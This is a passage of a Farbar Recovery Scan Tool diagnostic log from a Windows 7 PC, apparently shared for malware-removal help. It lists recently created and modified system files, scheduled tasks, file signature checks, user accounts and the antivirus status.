2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:01 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-10-11 23:30 - 2016-09-09 11:00 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-10-11 23:30 - 2016-09-09 11:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-10-11 23:30 - 2016-09-09 11:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-10-11 23:30 - 2016-09-09 11:00 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:51 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-10-11 23:30 - 2016-09-09 10:51 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-10-11 23:30 - 2016-09-09 10:51 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-10-11 23:30 - 2016-09-09 10:48 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-10-11 23:30 - 2016-09-09 10:47 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-10-11 23:30 - 2016-09-09 10:43 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-10-11 23:30 - 2016-09-09 10:38 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-10-11 23:30 - 2016-09-09 10:38 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-10-11 23:30 - 2016-09-09 10:38 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-10-11 23:30 - 2016-09-09 10:38 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-10-11 23:30 - 2016-09-09 10:37 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-10-11 23:30 - 2016-09-08 13:34 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2016-10-11 23:30 - 2016-09-08 13:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll
2016-10-11 23:30 - 2016-09-08 13:34 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2016-10-11 23:30 - 2016-09-08 13:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll
2016-10-11 23:30 - 2016-09-08 07:55 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-10-11 23:30 - 2016-09-08 07:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-10-11 23:30 - 2016-08-16 11:47 - 00419640 _____ C:\Windows\SysWOW64\locale.nls
2016-10-11 23:30 - 2016-08-16 11:47 - 00419640 _____ C:\Windows\system32\locale.nls
2016-10-11 23:30 - 2016-08-12 10:02 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-10-11 23:30 - 2016-08-12 10:02 - 12574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2016-10-11 23:30 - 2016-08-12 10:02 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2016-10-11 23:30 - 2016-08-12 10:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2016-10-11 23:30 - 2016-08-12 10:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2016-10-11 23:30 - 2016-08-12 09:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2016-10-11 23:30 - 2016-08-12 09:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-10-11 23:30 - 2016-08-12 09:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2016-10-11 23:30 - 2016-08-12 09:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2016-10-11 23:30 - 2016-08-12 09:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2016-10-11 23:30 - 2016-08-12 09:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll
2016-10-11 23:30 - 2016-08-06 08:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2016-10-11 23:30 - 2016-08-06 08:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2016-10-11 23:30 - 2016-08-06 07:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2016-10-11 23:30 - 2016-08-06 07:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe
2016-10-11 23:30 - 2016-08-06 07:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll
2016-10-11 23:30 - 2016-07-22 07:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2016-10-11 23:30 - 2016-07-22 07:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2016-10-11 23:30 - 2016-06-14 10:21 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-10-11 23:30 - 2016-06-14 10:16 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-10-11 23:30 - 2016-06-14 10:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2016-10-11 23:30 - 2016-06-14 08:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-10-11 23:30 - 2016-06-14 08:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-10-11 23:30 - 2016-06-14 08:15 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-10-11 23:30 - 2016-06-14 08:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-10-11 23:30 - 2016-06-14 08:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-10-11 23:30 - 2016-06-14 08:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-10-11 23:30 - 2016-06-14 08:00 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2016-10-11 23:30 - 2016-06-14 08:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2016-10-10 11:30 - 2016-10-10 11:30 - 00074352 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2016-10-10 11:30 - 2016-10-10 11:30 - 00074352 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2016-10-10 11:30 - 2016-10-10 11:30 - 00074352 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2016-10-10 11:30 - 2016-10-10 11:30 - 00038000 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2016-09-20 13:35 - 2016-08-05 08:30 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-09-20 13:35 - 2016-08-05 08:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 19:05 - 2016-04-07 22:00 - 00000904 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2016-10-19 18:42 - 2015-11-11 16:34 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-10-19 18:32 - 2014-05-09 19:43 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-10-19 16:24 - 2016-07-12 21:41 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-10-19 16:13 - 2009-07-13 21:45 - 00015328 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-19 16:13 - 2009-07-13 21:45 - 00015328 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-10-19 16:11 - 2009-07-13 22:13 - 00889990 _____ C:\Windows\system32\PerfStringBackup.INI
2016-10-19 16:11 - 2009-07-13 20:20 - 00000000 ____D C:\Windows\inf
2016-10-19 16:06 - 2015-07-19 19:31 - 00000000 ____D C:\Users\King\AppData\Roaming\obs-studio
2016-10-19 16:05 - 2016-04-07 22:05 - 00000000 ___RD C:\Users\King\Dropbox
2016-10-19 16:05 - 2016-04-07 22:00 - 00000900 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2016-10-19 16:05 - 2014-05-09 19:43 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-10-19 16:05 - 2009-07-13 22:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-19 16:00 - 2015-02-02 19:43 - 00000000 ____D C:\Users\King\AppData\Local\Oculus
2016-10-19 07:55 - 2016-04-11 04:12 - 00001080 _____ C:\Windows\system32\settingsbkup.sfm
2016-10-19 07:55 - 2016-04-11 04:12 - 00001080 _____ C:\Windows\system32\settings.sfm
2016-10-19 07:55 - 2016-04-09 22:08 - 00061352 _____ C:\Windows\system32\BMXStateBkp-{00000008-00000000-00000001-00001102-00000005-00311102}.rfx
2016-10-19 07:55 - 2016-04-09 22:08 - 00061352 _____ C:\Windows\system32\BMXState-{00000008-00000000-00000001-00001102-00000005-00311102}.rfx
2016-10-19 07:55 - 2016-04-09 22:08 - 00000788 _____ C:\Windows\system32\DVCState-{00000008-00000000-00000001-00001102-00000005-00311102}.rfx
2016-10-19 00:34 - 2013-10-04 15:52 - 00000000 ____D C:\Users\King\AppData\Roaming\foobar2000
2016-10-18 21:13 - 2014-12-06 03:35 - 00003918 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{3E7BF249-1222-4D5D-AE4D-2229F3700048}
2016-10-16 21:44 - 2014-06-02 19:04 - 00000000 ____D C:\Users\King\AppData\Local\CrashDumps
2016-10-16 16:17 - 2014-05-15 15:45 - 00000000 ____D C:\Users\King\Documents\My PSP Files
2016-10-14 20:30 - 2013-12-09 21:18 - 00000000 ____D C:\Users\King\AppData\Roaming\Audacity
2016-10-13 14:55 - 2016-04-07 22:00 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-10-12 03:49 - 2009-07-13 20:20 - 00000000 ____D C:\Windows\rescache
2016-10-12 03:24 - 2009-07-13 21:45 - 00291776 _____ C:\Windows\system32\FNTCACHE.DAT
2016-10-12 03:23 - 2014-05-30 03:03 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-10-12 03:23 - 2014-05-30 03:03 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-10-12 03:21 - 2009-07-13 20:20 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-10-12 03:21 - 2009-07-13 20:20 - 00000000 ____D C:\Windows\system32\Dism
2016-10-12 03:06 - 2014-05-10 12:45 - 00000000 ____D C:\Windows\system32\MRT
2016-10-12 03:01 - 2014-05-30 03:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-10-12 03:01 - 2014-05-10 12:45 - 143495576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-10-10 14:27 - 2014-05-23 00:46 - 00000426 _____ C:\Windows\BRWMARK.INI
2016-10-06 16:59 - 2014-05-30 23:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snaz
2016-10-03 14:19 - 2014-05-09 19:43 - 00002205 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-09-30 12:08 - 2015-08-25 00:22 - 00000000 ____D C:\Users\King\AppData\Local\Dropbox
2016-09-28 03:00 - 2014-05-28 00:15 - 00002127 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2016-09-28 03:00 - 2014-05-28 00:15 - 00001945 _____ C:\Windows\epplauncher.mif
2016-09-28 03:00 - 2014-05-28 00:15 - 00000000 ____D C:\Program Files\Microsoft Security Client
2016-09-28 03:00 - 2014-05-28 00:15 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
2016-09-26 13:18 - 2015-10-18 21:32 - 00002283 _____ C:\Users\King\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Logos Bible Software.lnk
2016-09-26 13:18 - 2014-07-30 17:38 - 00000000 ____D C:\Users\King\AppData\Local\Logos5

==================== Files in the root of some directories =======

2014-11-05 09:24 - 2015-07-04 00:11 - 0000296 _____ () C:\Users\King\AppData\Roaming\BreakingPoint_Login.ini
2014-11-05 09:50 - 2015-07-04 00:12 - 0001418 _____ () C:\Users\King\AppData\Roaming\BreakingPoint_Options.ini
2015-02-03 01:09 - 2015-02-03 01:09 - 0088949 _____ () C:\Users\King\AppData\Roaming\Exception Minidump (2015-02-03 08.09.53).mdmp
2015-02-03 01:09 - 2015-02-03 01:09 - 0013570 _____ () C:\Users\King\AppData\Roaming\Exception Report (2015-02-03 08.09.53).txt
2016-03-21 20:18 - 2016-03-21 20:18 - 0000055 _____ () C:\Users\King\AppData\Roaming\MouseServer.ini
2014-06-01 22:41 - 2015-08-25 10:28 - 0102188 _____ () C:\Users\King\AppData\Local\ars.cache
2014-06-01 22:41 - 2015-08-25 10:28 - 0241401 _____ () C:\Users\King\AppData\Local\census.cache
2015-12-05 21:32 - 2015-12-07 23:42 - 1065984 _____ () C:\Users\King\AppData\Local\file__0.localstorage
2014-06-01 22:29 - 2014-06-01 22:29 - 0000036 _____ () C:\Users\King\AppData\Local\housecall.guid.cache
2014-07-27 20:01 - 2014-07-27 20:07 - 209242615 _____ () C:\Users\King\AppData\Local\Logos4.rar
2014-07-27 20:30 - 2014-07-27 20:30 - 0388254 _____ () C:\Users\King\AppData\Local\Logos5.rar
2016-08-03 19:54 - 2016-08-03 19:54 - 0003846 _____ () C:\Users\King\AppData\Local\recently-used.xbel
2014-06-03 18:33 - 2014-08-31 12:37 - 0007638 _____ () C:\Users\King\AppData\Local\Resmon.ResmonCfg
2014-05-09 19:29 - 2014-05-09 19:29 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-10-15 00:50

==================== End of FRST.txt ============================

Addition.txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by King (19-10-2016 19:20:29)
Running from C:\Users\King\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2014-05-10 02:00:45)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1771700083-1338792134-2885675772-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1771700083-1338792134-2885675772-1009 - Limited - Enabled)
Guest (S-1-5-21-1771700083-1338792134-2885675772-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1771700083-1338792134-2885675772-1002 - Limited - Enabled)
King (S-1-5-21-1771700083-1338792134-2885675772-1001 - Administrator - Enabled) => C:\Users\King

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
